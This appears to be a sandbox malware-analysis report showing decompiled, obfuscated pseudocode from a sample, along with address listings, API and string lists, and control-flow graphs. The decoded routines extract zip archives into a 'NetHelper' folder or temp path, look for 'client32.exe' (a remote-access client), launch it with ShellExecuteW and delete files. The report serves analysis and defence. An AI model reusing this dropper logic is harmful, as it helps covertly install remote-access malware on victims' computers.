														wsprintfW(_a60, L"%s\\%s", _v0,  *((intOrPtr*)(_t353 + 0x88c + _t342 * 4)));
														_push(_a68);
														_push(_t337);
														E00952750(_t319);
														_t350 = _t353 + 0x18;
														_t187 = lstrcmpW( *(_t350 + 0x890 + _t342 * 4), L"client32.exe");
														_t301 =  *0x984928; // 0x0
														_t319 =  *0x98492c; // 0x0
														_t113 = _t301 - 1; // -1
														_t341 =  !(_t113 * _t301) | 0xfffffffe;
														_t341 - 0xffffffff = _t319 - 0xa;
														_t336 =  !=  ? 0x363e9522 : 0x4613d1a6;
														__eflags = _t341 - 0xffffffff;
														_t306 =  ==  ? 0x363e9522 : 0x4613d1a6;
														__eflags = _t319 - 0xa;
														_t279 =  >=  ? 0x4613d1a6 :  ==  ? 0x363e9522 : 0x4613d1a6;
														__eflags = _t187;
														_a75 = _t187 == 0;
														__eflags = 0x4613d1a6 - 0xfdb16206;
														if(0x4613d1a6 <= 0xfdb16206) {
															goto L4;
														} else {
														}
													} else {
														__eflags = _t279 - 0xeaa2e9c4;
														if(_t279 != 0xeaa2e9c4) {
															goto L3;
														} else {
															_t279 = 0xd9a3f059;
															 *_t350 = _a64 + 1;
															__eflags = 0xd9a3f059 - 0xfdb16206;
															if(0xd9a3f059 <= 0xfdb16206) {
																goto L4;
															} else {
															}
														}
													}
												}
											} else {
												__eflags = _t279 - 0xefe68583;
												if(_t279 > 0xefe68583) {
													__eflags = _t279 - 0xefe68584;
													if(_t279 == 0xefe68584) {
														_t319 = 0x2ea21af9;
														_a60 = _v28;
														__eflags = _a60 - _a12;
														_t279 =  <  ? 0x2ea21af9 : 0xfdb16207;
														__eflags = 0xfdb16207 - 0xfdb16206;
														if(0xfdb16207 <= 0xfdb16206) {
															goto L4;
														} else {
														}
													} else {
														__eflags = _t279 - 0xf04b8915;
														if(_t279 != 0xf04b8915) {
															goto L3;
														} else {
															_a8 =  &_a3252;
															E0096F420(_a4, 0xffffffff,  &_a3252);
															_a12 = _a3252;
															_t270 =  &_a2730;
															_a16 = _t270;
															_a20 = _t270;
															E00971660(_t336, _a20, 0, 0x105);
															_t350 = _t350 + 0x18;
															_t279 = 0xefe68584;
															_v28 = 0;
															__eflags = 0xefe68584 - 0xfdb16206;
															if(0xefe68584 <= 0xfdb16206) {
																goto L4;
															} else {
															}
														}
													}
												} else {
													__eflags = _t279 - 0xecda8d13;
													if(_t279 == 0xecda8d13) {
														_t273 =  *0x984928; // 0x0
														_t341 = 0x73cc2de4;
														_t336 = 0xee84e27c;
														_t56 = _t273 - 1; // -1
														_t312 = _t56 * _t273;
														_t275 = _t312 ^ 0xfffffffe;
														__eflags = _t275 & _t312;
														_t314 =  ==  ? 0x73cc2de4 : 0xee84e27c;
														__eflags =  *0x98492c - 0xa;
														_t315 =  >=  ? 0xee84e27c :  ==  ? 0x73cc2de4 : 0xee84e27c;
														_t319 = (_t319 & 0xffffff00 |  *0x98492c - 0x0000000a < 0x00000000) ^ (_t275 & 0xffffff00 | (_t275 & _t312) == 0x00000000);
														_t279 =  !=  ? 0x73cc2de4 :  >=  ? 0xee84e27c :  ==  ? 0x73cc2de4 : 0xee84e27c;
														__eflags = 0xee84e27c - 0xfdb16206;
														if(0xee84e27c <= 0xfdb16206) {
															goto L4;
														} else {
														}
													} else {
														__eflags = _t279 - 0xee84e27c;
														if(_t279 != 0xee84e27c) {
															goto L3;
														} else {
															_t279 = 0xecda8d13;
															__eflags = 0xecda8d13 - 0xfdb16206;
															if(0xecda8d13 <= 0xfdb16206) {
																goto L4;
															} else {
															}
														}
													}
												}
											}
										} else {
										}
									}
									continue;
								}
							}
						}
						L57:
						__eflags = _t279 - 0x2e2eaf83;
						if(_t279 > 0x2e2eaf83) {
							__eflags = _t279 - 0x2e2eaf84;
							if(_t279 == 0x2e2eaf84) {
								lstrcpyW(_a20, _a28);
								_t279 = 0x7628371;
								__eflags = 0x7628371 - 0xfdb16206;
								if(0x7628371 <= 0xfdb16206) {
									goto L4;
								} else {
									continue;
								}
								goto L93;
							} else {
								__eflags = _t279 - 0x2ea21af9;
								if(_t279 != 0x2ea21af9) {
									goto L3;
								} else {
									E0096F420(_a4, _a60,  &_a3252);
									_t239 =  &_a2208;
									_a24 = _t239;
									_t241 =  &_a3256;
									_a28 = _t239;
									_t341 = _t241;
									wsprintfW(_a28, L"%s\\%s", _v8, _t241);
									E0096F870(_a12, _a68, _a36);
									_t350 = _t350 + 0x28;
									__eflags = lstrcmpW(_t241, L"client32.exe");
									_t285 = 0x7628371;
									_t319 = 0x2e2eaf84;
									goto L47;
								}
							}
							goto L75;
						}
						__eflags = _t279 - 0x1d20d6e7;
						if(_t279 == 0x1d20d6e7) {
							_t233 = E0096F400(_v0, 0);
							_t350 = _t350 + 8;
							_a4 = _t233;
							_t281 = 0xf04b8915;
							_t218 = 0x69ddf2a4;
							__eflags = _a4;
							goto L91;
						}
						goto L75;
					}
					__eflags = _t279 - 0x158583f5;
					if(_t279 <= 0x158583f5) {
						__eflags = _t279 - 0xfdb16207;
						if(_t279 == 0xfdb16207) {
							E00951840(_a20, _a5408); // executed
							_t350 = _t350 + 8;
							ShellExecuteW(0, L"open", _a20, 0, 0, 2); // executed
							_t279 = 0x69ddf2a4;
							__eflags = 0x69ddf2a4 - 0xfdb16206;
							if(0x69ddf2a4 <= 0xfdb16206) {
								goto L4;
							} else {
								goto L49;
							}
							goto L93;
						} else {
							__eflags = _t279 - 0x7628371;
							if(_t279 == 0x7628371) {
								_t279 = 0xefe68584;
								_v28 =  &(_a60[0]);
								__eflags = 0xefe68584 - 0xfdb16206;
								if(0xefe68584 <= 0xfdb16206) {
									goto L4;
								} else {
									goto L49;
								}
								goto L93;
							} else {
								__eflags = _t279 - 0xae3ec6c;
								if(_t279 != 0xae3ec6c) {
									goto L3;
								} else {
									lstrcpyW(_a40, _a52);
									_t279 = 0xeaa2e9c4;
									__eflags = 0xeaa2e9c4 - 0xfdb16206;
									if(0xeaa2e9c4 <= 0xfdb16206) {
										goto L4;
									} else {
										goto L49;
									}
								}
							}
						}
						goto L75;
					}
					goto L57;
				}
				goto L49;
			}




















































                                                                                                                              0x00951ae0
                                                                                                                              0x00951ae9
                                                                                                                              0x00951aee
                                                                                                                              0x00951af5
                                                                                                                              0x00951afc
                                                                                                                              0x00951b03
                                                                                                                              0x00951b0b
                                                                                                                              0x00951b19
                                                                                                                              0x00951b1f
                                                                                                                              0x00951b25
                                                                                                                              0x00951b2a
                                                                                                                              0x00951b34
                                                                                                                              0x00000000
                                                                                                                              0x00951b36
                                                                                                                              0x00000000
                                                                                                                              0x00952080
                                                                                                                              0x0095208e
                                                                                                                              0x0095218a
                                                                                                                              0x00952190
                                                                                                                              0x00952324
                                                                                                                              0x00952333
                                                                                                                              0x00952336
                                                                                                                              0x0095233c
                                                                                                                              0x00000000
                                                                                                                              0x00952342
                                                                                                                              0x00000000
                                                                                                                              0x00952342
                                                                                                                              0x00000000
                                                                                                                              0x00952196
                                                                                                                              0x00952196
                                                                                                                              0x0095219c
                                                                                                                              0x00952347
                                                                                                                              0x0095234c
                                                                                                                              0x00952351
                                                                                                                              0x00952356
                                                                                                                              0x00952361
                                                                                                                              0x00952364
                                                                                                                              0x00000000
                                                                                                                              0x009521a2
                                                                                                                              0x009521a2
                                                                                                                              0x009521a8
                                                                                                                              0x00000000
                                                                                                                              0x009521ae
                                                                                                                              0x009521b5
                                                                                                                              0x009521bd
                                                                                                                              0x009521c5
                                                                                                                              0x009521cb
                                                                                                                              0x009521d3
                                                                                                                              0x009521df
                                                                                                                              0x009521e4
                                                                                                                              0x009521ec
                                                                                                                              0x009521f1
                                                                                                                              0x009521f9
                                                                                                                              0x009521fc
                                                                                                                              0x00952201
                                                                                                                              0x00952206
                                                                                                                              0x0095220e
                                                                                                                              0x00952213
                                                                                                                              0x00952217
                                                                                                                              0x0095221e
                                                                                                                              0x00952228
                                                                                                                              0x00952237
                                                                                                                              0x0095223c
                                                                                                                              0x0095223f
                                                                                                                              0x00952244
                                                                                                                              0x0095224b
                                                                                                                              0x00952251
                                                                                                                              0x00000000
                                                                                                                              0x00952257
                                                                                                                              0x00000000
                                                                                                                              0x00952257
                                                                                                                              0x00952251
                                                                                                                              0x009521a8
                                                                                                                              0x0095219c
                                                                                                                              0x00000000
                                                                                                                              0x00952094
                                                                                                                              0x0095209a
                                                                                                                              0x009522a4
                                                                                                                              0x009522aa
                                                                                                                              0x009523fd
                                                                                                                              0x00952402
                                                                                                                              0x00952408
                                                                                                                              0x00000000
                                                                                                                              0x0095240e
                                                                                                                              0x00000000
                                                                                                                              0x0095240e
                                                                                                                              0x00000000
                                                                                                                              0x009522b0
                                                                                                                              0x009522b0
                                                                                                                              0x009522b6
                                                                                                                              0x00000000
                                                                                                                              0x009522bc
                                                                                                                              0x009522bc
                                                                                                                              0x009522c1
                                                                                                                              0x009522c6
                                                                                                                              0x009522cb
                                                                                                                              0x009522d6
                                                                                                                              0x009522d9
                                                                                                                              0x00952369
                                                                                                                              0x00952369
                                                                                                                              0x0095236c
                                                                                                                              0x0095236f
                                                                                                                              0x00952379
                                                                                                                              0x0095237c
                                                                                                                              0x0095237e
                                                                                                                              0x00952381
                                                                                                                              0x00952387
                                                                                                                              0x00000000
                                                                                                                              0x0095238d
                                                                                                                              0x00000000
                                                                                                                              0x0095238d
                                                                                                                              0x00000000
                                                                                                                              0x00952387
                                                                                                                              0x009522b6
                                                                                                                              0x009522ef
                                                                                                                              0x009522ef
                                                                                                                              0x009522f5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x009520a0
                                                                                                                              0x009520a6
                                                                                                                              0x00951b3b
                                                                                                                              0x00951b52
                                                                                                                              0x00951b59
                                                                                                                              0x00951b5c
                                                                                                                              0x00951b5e
                                                                                                                              0x00951b71
                                                                                                                              0x00951b76
                                                                                                                              0x00951b7b
                                                                                                                              0x00951b7c
                                                                                                                              0x00951b7d
                                                                                                                              0x00951b82
                                                                                                                              0x00951b91
                                                                                                                              0x00951b97
                                                                                                                              0x00000000
                                                                                                                              0x009520ac
                                                                                                                              0x009520b2
                                                                                                                              0x00951ba0
                                                                                                                              0x00951ba0
                                                                                                                              0x00951ba6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x009520b8
                                                                                                                              0x009520bc
                                                                                                                              0x009520c2
                                                                                                                              0x009520cd
                                                                                                                              0x00951bac
                                                                                                                              0x00951bac
                                                                                                                              0x00951bac
                                                                                                                              0x00951bb2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951bb4
                                                                                                                              0x00951bba
                                                                                                                              0x00951c76
                                                                                                                              0x00951c7c
                                                                                                                              0x00951e62
                                                                                                                              0x00951e71
                                                                                                                              0x00951e79
                                                                                                                              0x00951e99
                                                                                                                              0x00951eb3
                                                                                                                              0x00951ed4
                                                                                                                              0x00951ee8
                                                                                                                              0x00951eea
                                                                                                                              0x00951ef3
                                                                                                                              0x00951ef9
                                                                                                                              0x00951efb
                                                                                                                              0x00951f00
                                                                                                                              0x00000000
                                                                                                                              0x00951c82
                                                                                                                              0x00951c82
                                                                                                                              0x00951c88
                                                                                                                              0x00000000
                                                                                                                              0x00951c8e
                                                                                                                              0x00951c8e
                                                                                                                              0x00951c94
                                                                                                                              0x00000000
                                                                                                                              0x00951c9a
                                                                                                                              0x00951ca5
                                                                                                                              0x00951caa
                                                                                                                              0x00951cbe
                                                                                                                              0x00951f0e
                                                                                                                              0x00951f0e
                                                                                                                              0x00951f13
                                                                                                                              0x00951f19
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951f1f
                                                                                                                              0x00951f19
                                                                                                                              0x00951c94
                                                                                                                              0x00951c88
                                                                                                                              0x00951bc0
                                                                                                                              0x00951bc0
                                                                                                                              0x00951bc6
                                                                                                                              0x00951d1b
                                                                                                                              0x00951d21
                                                                                                                              0x00952022
                                                                                                                              0x00952027
                                                                                                                              0x0095202d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952033
                                                                                                                              0x00951d27
                                                                                                                              0x00951d27
                                                                                                                              0x00951d2d
                                                                                                                              0x00000000
                                                                                                                              0x00951d33
                                                                                                                              0x00951d39
                                                                                                                              0x00951d3f
                                                                                                                              0x00951d46
                                                                                                                              0x00951d5f
                                                                                                                              0x00951d61
                                                                                                                              0x00951d66
                                                                                                                              0x00000000
                                                                                                                              0x00951d66
                                                                                                                              0x00951d2d
                                                                                                                              0x00951bcc
                                                                                                                              0x00951bcc
                                                                                                                              0x00951bd2
                                                                                                                              0x00951df9
                                                                                                                              0x00951dfe
                                                                                                                              0x00951e03
                                                                                                                              0x00952434
                                                                                                                              0x00952434
                                                                                                                              0x00952437
                                                                                                                              0x0095243d
                                                                                                                              0x00000000
                                                                                                                              0x00952443
                                                                                                                              0x00000000
                                                                                                                              0x00952443
                                                                                                                              0x00952448
                                                                                                                              0x00952453
                                                                                                                              0x00952464
                                                                                                                              0x00951bd8
                                                                                                                              0x00951bd8
                                                                                                                              0x00951bde
                                                                                                                              0x00000000
                                                                                                                              0x00951be0
                                                                                                                              0x00951be0
                                                                                                                              0x00951be7
                                                                                                                              0x00951bf1
                                                                                                                              0x00951c02
                                                                                                                              0x00951c07
                                                                                                                              0x00951c0b
                                                                                                                              0x00951c12
                                                                                                                              0x00951c17
                                                                                                                              0x00951c1a
                                                                                                                              0x00951c1c
                                                                                                                              0x00951c21
                                                                                                                              0x00952062
                                                                                                                              0x00952062
                                                                                                                              0x00952065
                                                                                                                              0x0095206b
                                                                                                                              0x00000000
                                                                                                                              0x00952071
                                                                                                                              0x00952071
                                                                                                                              0x00952071
                                                                                                                              0x0095206b
                                                                                                                              0x00951bde
                                                                                                                              0x00951bd2
                                                                                                                              0x00951bc6
                                                                                                                              0x00000000
                                                                                                                              0x00951bba
                                                                                                                              0x00951c30
                                                                                                                              0x00951c36
                                                                                                                              0x00951cd1
                                                                                                                              0x00951cd7
                                                                                                                              0x00951f2c
                                                                                                                              0x00951f31
                                                                                                                              0x00951f39
                                                                                                                              0x00951f3c
                                                                                                                              0x00951f3f
                                                                                                                              0x00951f45
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951f4b
                                                                                                                              0x00951cdd
                                                                                                                              0x00951cdd
                                                                                                                              0x00951ce3
                                                                                                                              0x00951f50
                                                                                                                              0x00951f57
                                                                                                                              0x00951f5b
                                                                                                                              0x00951f61
                                                                                                                              0x00951f79
                                                                                                                              0x00951f7b
                                                                                                                              0x00951f7e
                                                                                                                              0x00951f82
                                                                                                                              0x00951f93
                                                                                                                              0x00951fa5
                                                                                                                              0x00951faa
                                                                                                                              0x00951fae
                                                                                                                              0x00951faf
                                                                                                                              0x00951fb4
                                                                                                                              0x00951fc3
                                                                                                                              0x00951fc9
                                                                                                                              0x00951fcf
                                                                                                                              0x00951fdf
                                                                                                                              0x00951fe7
                                                                                                                              0x00951ff0
                                                                                                                              0x00951ff8
                                                                                                                              0x00951ffb
                                                                                                                              0x00952000
                                                                                                                              0x00952003
                                                                                                                              0x00952006
                                                                                                                              0x00952009
                                                                                                                              0x0095200b
                                                                                                                              0x00952010
                                                                                                                              0x00952016
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0095201c
                                                                                                                              0x00951ce9
                                                                                                                              0x00951ce9
                                                                                                                              0x00951cef
                                                                                                                              0x00000000
                                                                                                                              0x00951cf5
                                                                                                                              0x00951d01
                                                                                                                              0x00951d07
                                                                                                                              0x00951d0a
                                                                                                                              0x00951d10
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951d16
                                                                                                                              0x00951d10
                                                                                                                              0x00951cef
                                                                                                                              0x00951ce3
                                                                                                                              0x00951c3c
                                                                                                                              0x00951c3c
                                                                                                                              0x00951c42
                                                                                                                              0x00951d70
                                                                                                                              0x00951d76
                                                                                                                              0x00952039
                                                                                                                              0x0095203e
                                                                                                                              0x0095204a
                                                                                                                              0x00952051
                                                                                                                              0x00952054
                                                                                                                              0x0095205a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00952060
                                                                                                                              0x00951d7c
                                                                                                                              0x00951d7c
                                                                                                                              0x00951d82
                                                                                                                              0x00000000
                                                                                                                              0x00951d88
                                                                                                                              0x00951d8f
                                                                                                                              0x00951da0
                                                                                                                              0x00951daf
                                                                                                                              0x00951db3
                                                                                                                              0x00951dba
                                                                                                                              0x00951dc4
                                                                                                                              0x00951dd3
                                                                                                                              0x00951dd8
                                                                                                                              0x00951ddb
                                                                                                                              0x00951de0
                                                                                                                              0x00951de8
                                                                                                                              0x00951dee
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951df4
                                                                                                                              0x00951dee
                                                                                                                              0x00951d82
                                                                                                                              0x00951c48
                                                                                                                              0x00951c48
                                                                                                                              0x00951c4e
                                                                                                                              0x00951e0d
                                                                                                                              0x00951e12
                                                                                                                              0x00951e17
                                                                                                                              0x00951e1c
                                                                                                                              0x00951e1f
                                                                                                                              0x00951e24
                                                                                                                              0x00951e27
                                                                                                                              0x00951e31
                                                                                                                              0x00951e34
                                                                                                                              0x00951e3e
                                                                                                                              0x00951e41
                                                                                                                              0x00951e43
                                                                                                                              0x00951e46
                                                                                                                              0x00951e4c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951e52
                                                                                                                              0x00951c54
                                                                                                                              0x00951c54
                                                                                                                              0x00951c5a
                                                                                                                              0x00000000
                                                                                                                              0x00951c60
                                                                                                                              0x00951c60
                                                                                                                              0x00951c65
                                                                                                                              0x00951c6b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00951c71
                                                                                                                              0x00951c6b
                                                                                                                              0x00951c5a
                                                                                                                              0x00951c4e
                                                                                                                              0x00951c42
                                                                                                                              0x00000000
                                                                                                                              0x009520d3
                                                                                                                              0x009520cd
                                                                                                                              0x00000000
                                                                                                                              0x009520b2
                                                                                                                              0x009520a6
                                                                                                                              0x0095209a
                                                                                                                              0x009520ec
                                                                                                                              0x009520ec
                                                                                                                              0x009520f2
                                                                                                                              0x009520f8
                                                                                                                              0x009520fe
                                                                                                                              0x00952308
                                                                                                                              0x0095230e
                                                                                                                              0x00952313
                                                                                                                              0x00952319
                                                                                                                              0x00000000
                                                                                                                              0x0095231f
                                                                                                                              0x00000000
                                                                                                                              0x0095231f
                                                                                                                              0x00000000
                                                                                                                              0x00952104
                                                                                                                              0x00952104
                                                                                                                              0x0095210a
                                                                                                                              0x00000000
                                                                                                                              0x00952110
                                                                                                                              0x00952120
                                                                                                                              0x00952128
                                                                                                                              0x0095212f
                                                                                                                              0x00952139
                                                                                                                              0x00952140
                                                                                                                              0x00952144
                                                                                                                              0x00952154
                                                                                                                              0x00952165
                                                                                                                              0x0095216a
                                                                                                                              0x00952179
                                                                                                                              0x0095217b
                                                                                                                              0x00952180
                                                                                                                              0x00000000
                                                                                                                              0x00952180
                                                                                                                              0x0095210a
                                                                                                                              0x00000000
                                                                                                                              0x009520fe
                                                                                                                              0x009522e3
                                                                                                                              0x009522e9
                                                                                                                              0x00952419
                                                                                                                              0x0095241e
                                                                                                                              0x00952421
                                                                                                                              0x00952425
                                                                                                                              0x0095242a
                                                                                                                              0x0095242f
                                                                                                                              0x00000000
                                                                                                                              0x0095242f
                                                                                                                              0x00000000
                                                                                                                              0x009522e9
                                                                                                                              0x009520e0
                                                                                                                              0x009520e6
                                                                                                                              0x0095225c
                                                                                                                              0x00952262
                                                                                                                              0x0095239d
                                                                                                                              0x009523a2
                                                                                                                              0x009523b6
                                                                                                                              0x009523c4
                                                                                                                              0x009523c9
                                                                                                                              0x009523cf
                                                                                                                              0x00000000
                                                                                                                              0x009523d5
                                                                                                                              0x00000000
                                                                                                                              0x009523d5
                                                                                                                              0x00000000
                                                                                                                              0x00952268
                                                                                                                              0x00952268
                                                                                                                              0x0095226e
                                                                                                                              0x009523e2
                                                                                                                              0x009523e8
                                                                                                                              0x009523ec
                                                                                                                              0x009523f2
                                                                                                                              0x00000000
                                                                                                                              0x009523f8
                                                                                                                              0x00000000
                                                                                                                              0x009523f8
                                                                                                                              0x00000000
                                                                                                                              0x00952274
                                                                                                                              0x00952274
                                                                                                                              0x0095227a
                                                                                                                              0x00000000
                                                                                                                              0x00952280
                                                                                                                              0x00952288
                                                                                                                              0x0095228e
                                                                                                                              0x00952293
                                                                                                                              0x00952299
                                                                                                                              0x00000000
                                                                                                                              0x0095229f
                                                                                                                              0x00000000
                                                                                                                              0x0095229f
                                                                                                                              0x00952299
                                                                                                                              0x0095227a
                                                                                                                              0x0095226e
                                                                                                                              0x00000000
                                                                                                                              0x00952262
                                                                                                                              0x00000000
                                                                                                                              0x009520e6
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00951B19
                                                                                                                              • wsprintfW.USER32 ref: 00951C02
                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 009520BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteFileFolderPathSpecialwsprintf
                                                                                                                              • String ID: %s%s$%s\%s$%s\NetHelper_v_4.%d.%d.%d$%s\nh.zip$.zip$client32.exe$gfff$l$l$open$H!C$H!C
                                                                                                                              • API String ID: 823562424-3606034939
                                                                                                                              • Opcode ID: 0c85b758bfe5e2b0e250299087f097a69e1c57c33c6493b67831a01320198f71
                                                                                                                              • Instruction ID: 57334c1a11fe1398fe94d3c965224ac9019664b0b12e4115d0d99c28029b7c9f
                                                                                                                              • Opcode Fuzzy Hash: 0c85b758bfe5e2b0e250299087f097a69e1c57c33c6493b67831a01320198f71
                                                                                                                              • Instruction Fuzzy Hash: B0220235A093009BCB28DF65DC91B3EB7E5AFC9312F24491EFD56963A0E73198489B43
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00952470 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 169COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 968 952470-9524c1 GetTempPathW 969 9524c3 968->969 970 9524eb-9524f0 968->970 971 952580-952585 969->971 972 952540-952545 970->972 973 9524f2-9524f7 970->973 976 952587-95258c 971->976 977 9525b0-9525b5 971->977 974 952607-952667 call 96f420 wsprintfW call 96f870 ShellExecuteW 972->974 975 95254b-952550 972->975 978 9524f9-9524fe 973->978 979 9524c8-9524db 973->979 974->970 1013 95266d 974->1013 981 9524e0-9524e5 975->981 982 952552-952572 975->982 983 952672-9526ca call 972cc2 call 972cd4 wsprintfW call 952750 976->983 984 952592-952597 976->984 985 952705-95270f 977->985 986 9525bb-9525c0 977->986 987 952504-952509 978->987 988 9525e8-9525fc DeleteFileW 978->988 979->981 981->970 981->971 982->970 991 952578 982->991 992 952714-95271c 983->992 993 95259d-9525a2 984->993 994 9526cc-9526fa call 96f420 984->994 985->992 986->981 996 9525c6-9525e0 call 96f890 986->996 987->981 997 95250b-95252c call 96f400 987->997 988->970 989 952602 988->989 989->971 991->971 992->970 1001 952722 992->1001 993->981 1002 9525a8-952742 call 96fb8d 993->1002 994->970 1012 952700 994->1012 996->970 1011 9525e6 996->1011 997->992 1001->971 1011->971 1012->971 1013->971
                                                                                                                              APIs
                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 009524A2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PathTemp
                                                                                                                              • String ID: %s%s$%s\%d.zip$open
                                                                                                                              • API String ID: 2920410445-1147628164
                                                                                                                              • Opcode ID: afcccbd634af567011a776a1eb1bb69d7a4fe649f2761aa7a4a54aa587731aa0
                                                                                                                              • Instruction ID: b83dd2081d5154fefb2ab80ab88fd2b8a1fa89db00f8162b7119c89f54c0a179
                                                                                                                              • Opcode Fuzzy Hash: afcccbd634af567011a776a1eb1bb69d7a4fe649f2761aa7a4a54aa587731aa0
                                                                                                                              • Instruction Fuzzy Hash: 0A51F4706083019BE720DF09DC85B6EB7E1BB86305F60482EF899DA271E770D918DB97
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041FFB9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 36libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1019 41ffb9-41ffca TlsGetValue 1020 41ffed-41fffc GetModuleHandleA 1019->1020 1021 41ffcc-41ffd4 1019->1021 1022 420021-420026 1020->1022 1023 41fffe-420005 call 41ff4d 1020->1023 1021->1020 1024 41ffd6-41ffe3 TlsGetValue 1021->1024 1023->1022 1029 420007-42000d GetProcAddress 1023->1029 1024->1020 1028 41ffe5-41ffeb 1024->1028 1030 420013-420015 1028->1030 1029->1030 1030->1022 1031 420017-42001d RtlEncodePointer 1030->1031 1031->1022
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E0041FFB9(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t13;
				void* _t14;
				struct HINSTANCE__* _t16;

				if(TlsGetValue( *0x43a8b4) == 0) {
					L4:
					_t16 = GetModuleHandleA("KERNEL32.DLL");
					__eflags = _t16;
					if(__eflags == 0) {
						L9:
						return _a4;
					}
					_t8 = E0041FF4D(_t14, __eflags);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L9;
					}
					_t9 = GetProcAddress(_t16, "EncodePointer");
					L7:
					if(_t9 != 0) {
						_t10 =  *_t9(_a4); // executed
						_v0 = _t10;
					}
					goto L9;
				}
				_t11 =  *0x43a8b0; // 0x6
				if(_t11 == 0xffffffff) {
					goto L4;
				}
				_push(_t11);
				_t13 =  *(TlsGetValue( *0x43a8b4))();
				if(_t13 == 0) {
					goto L4;
				}
				_t9 =  *(_t13 + 0x1f8);
				goto L7;
			}











                                                                                                                              0x0041ffca
                                                                                                                              0x0041ffed
                                                                                                                              0x0041fff8
                                                                                                                              0x0041fffa
                                                                                                                              0x0041fffc
                                                                                                                              0x00420021
                                                                                                                              0x00420026
                                                                                                                              0x00420026
                                                                                                                              0x0041fffe
                                                                                                                              0x00420003
                                                                                                                              0x00420005
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042000d
                                                                                                                              0x00420013
                                                                                                                              0x00420015
                                                                                                                              0x0042001b
                                                                                                                              0x0042001d
                                                                                                                              0x0042001d
                                                                                                                              0x00000000
                                                                                                                              0x00420015
                                                                                                                              0x0041ffcc
                                                                                                                              0x0041ffd4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ffd6
                                                                                                                              0x0041ffdf
                                                                                                                              0x0041ffe3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ffe5
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • TlsGetValue.KERNEL32(00429033,004290B3,00429033,00000014,00424061,00000000,00000FA0,00439018,0000000C,004240C0,0041AD79,?,?,00425EA3,00000004,00439078), ref: 0041FFC6
                                                                                                                              • TlsGetValue.KERNEL32(00000006,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 0041FFDD
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 0041FFF2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042000D
                                                                                                                              • RtlEncodePointer.NTDLL(0041AD79,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 0042001B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$AddressEncodeHandleModulePointerProc
                                                                                                                              • String ID: EncodePointer$KERNEL32.DLL
